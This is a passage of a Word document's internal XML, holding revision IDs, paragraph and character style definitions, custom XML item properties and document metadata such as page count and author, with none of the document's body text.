    <w:rsid w:val="00603486"/>
    <w:rsid w:val="0060743E"/>
    <w:rsid w:val="0061596F"/>
    <w:rsid w:val="00615DFC"/>
    <w:rsid w:val="006367F1"/>
    <w:rsid w:val="00641BC1"/>
    <w:rsid w:val="006827AB"/>
    <w:rsid w:val="006E6536"/>
    <w:rsid w:val="006F12C6"/>
    <w:rsid w:val="007135E6"/>
    <w:rsid w:val="0072512F"/>
    <w:rsid w:val="00727F8B"/>
    <w:rsid w:val="00732502"/>
    <w:rsid w:val="00734846"/>
    <w:rsid w:val="007450DA"/>
    <w:rsid w:val="00771512"/>
    <w:rsid w:val="00785ED5"/>
    <w:rsid w:val="00790FEC"/>
    <w:rsid w:val="007A594D"/>
    <w:rsid w:val="007A5ECE"/>
    <w:rsid w:val="007B60F2"/>
    <w:rsid w:val="007E1F6B"/>
    <w:rsid w:val="007E1F7D"/>
    <w:rsid w:val="00800AEF"/>
    <w:rsid w:val="00842CE8"/>
    <w:rsid w:val="00845161"/>
    <w:rsid w:val="00846C19"/>
    <w:rsid w:val="008474DE"/>
    <w:rsid w:val="00850B1C"/>
    <w:rsid w:val="008549D7"/>
    <w:rsid w:val="008616C0"/>
    <w:rsid w:val="0087211D"/>
    <w:rsid w:val="00872C4B"/>
    <w:rsid w:val="008A2E4F"/>
    <w:rsid w:val="008B7442"/>
    <w:rsid w:val="008E056A"/>
    <w:rsid w:val="008F67D1"/>
    <w:rsid w:val="008F6ED8"/>
    <w:rsid w:val="0090498C"/>
    <w:rsid w:val="00921713"/>
    <w:rsid w:val="00922CF8"/>
    <w:rsid w:val="00932F33"/>
    <w:rsid w:val="00936327"/>
    <w:rsid w:val="00962EED"/>
    <w:rsid w:val="00967CAC"/>
    <w:rsid w:val="009709B4"/>
    <w:rsid w:val="00974CD3"/>
    <w:rsid w:val="0098095D"/>
    <w:rsid w:val="009861ED"/>
    <w:rsid w:val="00987D45"/>
    <w:rsid w:val="00990094"/>
    <w:rsid w:val="009A4034"/>
    <w:rsid w:val="009C5B27"/>
    <w:rsid w:val="009C67EC"/>
    <w:rsid w:val="009D15D3"/>
    <w:rsid w:val="009E6905"/>
    <w:rsid w:val="009F1682"/>
    <w:rsid w:val="009F17B4"/>
    <w:rsid w:val="00A04D3C"/>
    <w:rsid w:val="00A23820"/>
    <w:rsid w:val="00A4372C"/>
    <w:rsid w:val="00A437AA"/>
    <w:rsid w:val="00A703C7"/>
    <w:rsid w:val="00A84271"/>
    <w:rsid w:val="00A84E06"/>
    <w:rsid w:val="00A92AD8"/>
    <w:rsid w:val="00A941A9"/>
    <w:rsid w:val="00A94692"/>
    <w:rsid w:val="00AA453F"/>
    <w:rsid w:val="00AC3A89"/>
    <w:rsid w:val="00AC56DD"/>
    <w:rsid w:val="00AD7765"/>
    <w:rsid w:val="00B016DA"/>
    <w:rsid w:val="00B200E7"/>
    <w:rsid w:val="00B3781B"/>
    <w:rsid w:val="00B53883"/>
    <w:rsid w:val="00B64827"/>
    <w:rsid w:val="00B76B38"/>
    <w:rsid w:val="00B773CF"/>
    <w:rsid w:val="00B8098C"/>
    <w:rsid w:val="00B936CA"/>
    <w:rsid w:val="00BA3BDF"/>
    <w:rsid w:val="00BB7F19"/>
    <w:rsid w:val="00BC4910"/>
    <w:rsid w:val="00BD1763"/>
    <w:rsid w:val="00BD2CBC"/>
    <w:rsid w:val="00BF2F56"/>
    <w:rsid w:val="00BF4DA2"/>
    <w:rsid w:val="00BF6A3D"/>
    <w:rsid w:val="00C030CE"/>
    <w:rsid w:val="00C06D3B"/>
    <w:rsid w:val="00C271DD"/>
    <w:rsid w:val="00C3102D"/>
    <w:rsid w:val="00C35669"/>
    <w:rsid w:val="00C474CB"/>
    <w:rsid w:val="00C53684"/>
    <w:rsid w:val="00C6114A"/>
    <w:rsid w:val="00C635EB"/>
    <w:rsid w:val="00C90005"/>
    <w:rsid w:val="00C901A5"/>
    <w:rsid w:val="00CA3830"/>
    <w:rsid w:val="00CB2C53"/>
    <w:rsid w:val="00CB4BD0"/>
    <w:rsid w:val="00CC271C"/>
    <w:rsid w:val="00CE0C95"/>
    <w:rsid w:val="00CE1DEA"/>
    <w:rsid w:val="00D23F46"/>
    <w:rsid w:val="00D247E0"/>
    <w:rsid w:val="00D268D7"/>
    <w:rsid w:val="00D3372C"/>
    <w:rsid w:val="00D44104"/>
    <w:rsid w:val="00D51EC8"/>
    <w:rsid w:val="00D56C73"/>
    <w:rsid w:val="00D82F9D"/>
    <w:rsid w:val="00D874C0"/>
    <w:rsid w:val="00D87751"/>
    <w:rsid w:val="00DA6DAA"/>
    <w:rsid w:val="00DE2A19"/>
    <w:rsid w:val="00DE372D"/>
    <w:rsid w:val="00E0498B"/>
    <w:rsid w:val="00E13ED4"/>
    <w:rsid w:val="00E14926"/>
    <w:rsid w:val="00E157D4"/>
    <w:rsid w:val="00E27423"/>
    <w:rsid w:val="00E520ED"/>
    <w:rsid w:val="00E6432B"/>
    <w:rsid w:val="00E65C6A"/>
    <w:rsid w:val="00E83912"/>
    <w:rsid w:val="00E848A1"/>
    <w:rsid w:val="00E8730B"/>
    <w:rsid w:val="00EA6F13"/>
    <w:rsid w:val="00ED17C5"/>
    <w:rsid w:val="00EE4A81"/>
    <w:rsid w:val="00EE6C1E"/>
    <w:rsid w:val="00EF0EAD"/>
    <w:rsid w:val="00EF5ECC"/>
    <w:rsid w:val="00F20D82"/>
    <w:rsid w:val="00F305DF"/>
    <w:rsid w:val="00F40232"/>
    <w:rsid w:val="00F51749"/>
    <w:rsid w:val="00F559EE"/>
    <w:rsid w:val="00F71A35"/>
    <w:rsid w:val="00F845DE"/>
    <w:rsid w:val="00F87244"/>
    <w:rsid w:val="00FB109B"/>
    <w:rsid w:val="00FB2C14"/>
    <w:rsid w:val="00FB3F0D"/>
    <w:rsid w:val="00FB4A28"/>
    <w:rsid w:val="00FE093D"/>
    <w:rsid w:val="00FE31B5"/>
    <w:rsid w:val="00FE4048"/>
    <w:rsid w:val="00FE51F1"/>
    <w:rsid w:val="00FE60BA"/>
    <w:rsid w:val="00FF0087"/>
    <w:rsid w:val="01D47F8D"/>
    <w:rsid w:val="022B1E25"/>
    <w:rsid w:val="02E90762"/>
    <w:rsid w:val="0321413B"/>
    <w:rsid w:val="03E37CED"/>
    <w:rsid w:val="04094C78"/>
    <w:rsid w:val="043D4F04"/>
    <w:rsid w:val="04442410"/>
    <w:rsid w:val="04743F67"/>
    <w:rsid w:val="04A647CA"/>
    <w:rsid w:val="04D01EF4"/>
    <w:rsid w:val="051B7D10"/>
    <w:rsid w:val="05F32DBC"/>
    <w:rsid w:val="060F18F8"/>
    <w:rsid w:val="062B4EDD"/>
    <w:rsid w:val="06D465DD"/>
    <w:rsid w:val="07212DDD"/>
    <w:rsid w:val="082D1D6A"/>
    <w:rsid w:val="08AD4100"/>
    <w:rsid w:val="090F1EE9"/>
    <w:rsid w:val="0916527D"/>
    <w:rsid w:val="098A3838"/>
    <w:rsid w:val="09C8299C"/>
    <w:rsid w:val="09F0285D"/>
    <w:rsid w:val="0A036F59"/>
    <w:rsid w:val="0A501421"/>
    <w:rsid w:val="0AEC6974"/>
    <w:rsid w:val="0C7A1F06"/>
    <w:rsid w:val="0C9E5C1E"/>
    <w:rsid w:val="0D5B286A"/>
    <w:rsid w:val="0DCF2837"/>
    <w:rsid w:val="0EF6009B"/>
    <w:rsid w:val="0F167393"/>
    <w:rsid w:val="11E63644"/>
    <w:rsid w:val="138C6520"/>
    <w:rsid w:val="14E55858"/>
    <w:rsid w:val="167834B8"/>
    <w:rsid w:val="16BF2B60"/>
    <w:rsid w:val="17096457"/>
    <w:rsid w:val="18363646"/>
    <w:rsid w:val="184077D8"/>
    <w:rsid w:val="1911682C"/>
    <w:rsid w:val="19150AB5"/>
    <w:rsid w:val="19F93558"/>
    <w:rsid w:val="1B446693"/>
    <w:rsid w:val="1B5D708F"/>
    <w:rsid w:val="1BAC5276"/>
    <w:rsid w:val="1C12049E"/>
    <w:rsid w:val="1C3B7FDD"/>
    <w:rsid w:val="1C5B6314"/>
    <w:rsid w:val="1D0E157D"/>
    <w:rsid w:val="1D120041"/>
    <w:rsid w:val="1D40568D"/>
    <w:rsid w:val="1DB25E37"/>
    <w:rsid w:val="1FAA5BE9"/>
    <w:rsid w:val="21C55DF6"/>
    <w:rsid w:val="229C47D4"/>
    <w:rsid w:val="22E01A46"/>
    <w:rsid w:val="238D3537"/>
    <w:rsid w:val="23BC26AD"/>
    <w:rsid w:val="23E972F9"/>
    <w:rsid w:val="244435D2"/>
    <w:rsid w:val="24C04FDC"/>
    <w:rsid w:val="254B1ED2"/>
    <w:rsid w:val="25C7728B"/>
    <w:rsid w:val="25DC5F2B"/>
    <w:rsid w:val="27CB7955"/>
    <w:rsid w:val="27D87577"/>
    <w:rsid w:val="27EF34F1"/>
    <w:rsid w:val="28762C95"/>
    <w:rsid w:val="28DB3015"/>
    <w:rsid w:val="2910443B"/>
    <w:rsid w:val="295973C8"/>
    <w:rsid w:val="2BE27A8A"/>
    <w:rsid w:val="2C04777D"/>
    <w:rsid w:val="2C784B05"/>
    <w:rsid w:val="2C7A0008"/>
    <w:rsid w:val="2D3022B4"/>
    <w:rsid w:val="2D364A63"/>
    <w:rsid w:val="2D4B5583"/>
    <w:rsid w:val="2E903E70"/>
    <w:rsid w:val="2EA9281C"/>
    <w:rsid w:val="2FC77CED"/>
    <w:rsid w:val="303611F8"/>
    <w:rsid w:val="303F04AF"/>
    <w:rsid w:val="308333A6"/>
    <w:rsid w:val="308D5EB4"/>
    <w:rsid w:val="30940E0A"/>
    <w:rsid w:val="31297EDF"/>
    <w:rsid w:val="315C5288"/>
    <w:rsid w:val="316D1664"/>
    <w:rsid w:val="31AF20DF"/>
    <w:rsid w:val="33DB43A2"/>
    <w:rsid w:val="34061FBB"/>
    <w:rsid w:val="347D19AD"/>
    <w:rsid w:val="348F0868"/>
    <w:rsid w:val="351B4C99"/>
    <w:rsid w:val="3605272D"/>
    <w:rsid w:val="36A2271E"/>
    <w:rsid w:val="38203D22"/>
    <w:rsid w:val="387E40BB"/>
    <w:rsid w:val="38C21A2E"/>
    <w:rsid w:val="390A7522"/>
    <w:rsid w:val="39262AB7"/>
    <w:rsid w:val="397720D5"/>
    <w:rsid w:val="39863EDD"/>
    <w:rsid w:val="39E13D03"/>
    <w:rsid w:val="3A865963"/>
    <w:rsid w:val="3A877F8A"/>
    <w:rsid w:val="3B376BA0"/>
    <w:rsid w:val="3B4706D4"/>
    <w:rsid w:val="3B58006C"/>
    <w:rsid w:val="3BB26D85"/>
    <w:rsid w:val="3CAD075F"/>
    <w:rsid w:val="3D6D6452"/>
    <w:rsid w:val="3E554B22"/>
    <w:rsid w:val="3F4030C8"/>
    <w:rsid w:val="3F440AC8"/>
    <w:rsid w:val="3F505E75"/>
    <w:rsid w:val="3F846E42"/>
    <w:rsid w:val="3FC015D6"/>
    <w:rsid w:val="3FC10E8F"/>
    <w:rsid w:val="401B2838"/>
    <w:rsid w:val="40694239"/>
    <w:rsid w:val="41F72149"/>
    <w:rsid w:val="42E40ACD"/>
    <w:rsid w:val="43A5310A"/>
    <w:rsid w:val="44804B5C"/>
    <w:rsid w:val="45DB2146"/>
    <w:rsid w:val="45E2663B"/>
    <w:rsid w:val="464C1D63"/>
    <w:rsid w:val="465836F7"/>
    <w:rsid w:val="46FC4843"/>
    <w:rsid w:val="471C337E"/>
    <w:rsid w:val="47811967"/>
    <w:rsid w:val="481438CD"/>
    <w:rsid w:val="489708A1"/>
    <w:rsid w:val="48B02852"/>
    <w:rsid w:val="48C66F74"/>
    <w:rsid w:val="49734B0E"/>
    <w:rsid w:val="498843DD"/>
    <w:rsid w:val="4A5B6BBC"/>
    <w:rsid w:val="4AD56E01"/>
    <w:rsid w:val="4BA77F2E"/>
    <w:rsid w:val="4D8F494F"/>
    <w:rsid w:val="4F2A7680"/>
    <w:rsid w:val="50000ED0"/>
    <w:rsid w:val="503F6D81"/>
    <w:rsid w:val="510D2307"/>
    <w:rsid w:val="533D4AC5"/>
    <w:rsid w:val="546F3343"/>
    <w:rsid w:val="54EE2E86"/>
    <w:rsid w:val="558C43EA"/>
    <w:rsid w:val="5635357E"/>
    <w:rsid w:val="57166E3F"/>
    <w:rsid w:val="580F6687"/>
    <w:rsid w:val="58AB1D89"/>
    <w:rsid w:val="59A12511"/>
    <w:rsid w:val="5A021623"/>
    <w:rsid w:val="5A324742"/>
    <w:rsid w:val="5A582D49"/>
    <w:rsid w:val="5AA65046"/>
    <w:rsid w:val="5B6F3344"/>
    <w:rsid w:val="5BB1662A"/>
    <w:rsid w:val="5DD94F09"/>
    <w:rsid w:val="5E0C32DE"/>
    <w:rsid w:val="5E3D64B6"/>
    <w:rsid w:val="5E8B71C2"/>
    <w:rsid w:val="5F274BAB"/>
    <w:rsid w:val="605C0691"/>
    <w:rsid w:val="60A86A31"/>
    <w:rsid w:val="60B50B3A"/>
    <w:rsid w:val="60CC4EDB"/>
    <w:rsid w:val="60CF4B51"/>
    <w:rsid w:val="61376AB5"/>
    <w:rsid w:val="61B808BB"/>
    <w:rsid w:val="62082EAD"/>
    <w:rsid w:val="624E7084"/>
    <w:rsid w:val="627F5BA7"/>
    <w:rsid w:val="63C79D24"/>
    <w:rsid w:val="649912DD"/>
    <w:rsid w:val="65ED7F19"/>
    <w:rsid w:val="66A73019"/>
    <w:rsid w:val="66E5005B"/>
    <w:rsid w:val="67FF1A2B"/>
    <w:rsid w:val="68DB2162"/>
    <w:rsid w:val="69110A10"/>
    <w:rsid w:val="69502F0A"/>
    <w:rsid w:val="6954235C"/>
    <w:rsid w:val="696F7BBC"/>
    <w:rsid w:val="69D519B1"/>
    <w:rsid w:val="6B0A3FAC"/>
    <w:rsid w:val="6C7926BE"/>
    <w:rsid w:val="6C8D74CD"/>
    <w:rsid w:val="6D337226"/>
    <w:rsid w:val="6D4D5460"/>
    <w:rsid w:val="6DCE60E7"/>
    <w:rsid w:val="6E1D22B5"/>
    <w:rsid w:val="7006582C"/>
    <w:rsid w:val="706D6302"/>
    <w:rsid w:val="71062FFD"/>
    <w:rsid w:val="717A7640"/>
    <w:rsid w:val="718C6145"/>
    <w:rsid w:val="733D57C5"/>
    <w:rsid w:val="738B299C"/>
    <w:rsid w:val="73B260DF"/>
    <w:rsid w:val="74AC62F7"/>
    <w:rsid w:val="758208D8"/>
    <w:rsid w:val="765D1540"/>
    <w:rsid w:val="7885416D"/>
    <w:rsid w:val="798720DB"/>
    <w:rsid w:val="7AB94E24"/>
    <w:rsid w:val="7B253A17"/>
    <w:rsid w:val="7C793044"/>
    <w:rsid w:val="7CE1606D"/>
    <w:rsid w:val="7D757A64"/>
    <w:rsid w:val="7DE26D93"/>
    <w:rsid w:val="7E20467A"/>
    <w:rsid w:val="7FEA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link w:val="35"/>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next w:val="1"/>
    <w:link w:val="36"/>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link w:val="37"/>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6"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="47"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4703"/>
        <w:tab w:val="right" w:pos="9406"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="50"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="17">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="11"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:r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1">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">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8"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:after="80"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="TOC Heading1"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="27">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="11"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="31">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="7"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="85000"/>
            <w14:lumOff w14:val="15000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="35">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36">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="3"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="37">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">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2"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"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rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="75000"/>
            <w14:lumOff w14:val="25000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="43">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="4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4">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="43"/>
    <w:qFormat/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2E75B6" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="48">
    <w:name w:val="List Table 4"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="49"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="standardContextua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9">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="11"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="11"/>
    <w:link w:val="16"/>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2d01c862f81827cb71e9bd531efb9ca7">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c07631ee871cadb39934111e4742cbe5"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464143-2CB3-4246-B37B-5F24B3ACE41E}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{85F6E898-7587-4329-95D3-86318B183E89}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DC58BE79-EE8A-4B70-8BE1-56C4232B5717}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps5.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{30F98D20-DA64-42D0-B740-F015A3E8453F}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal</Template>
  <Pages>13</Pages>
  <Words>6339</Words>
  <Characters>84812</Characters>
  <Lines>706</Lines>
  <Paragraphs>181</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>90970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2025-07-02T14:05:00Z</dcterms:created>
  <dc:creator>htbaccount zal</dc:creator>
  <cp:lastModifiedBy>htbaccount zal</cp:lastModifiedBy>
  <cp:lastPrinted>2025-07-02T14:18:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-10T13:37:13Z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F111D07F1A5F44428AE93F77DC96F380_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ContentTypeId">
    <vt:lpwstr>0x0101002EEF5914ED38FA4882D06FE21A543D69</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>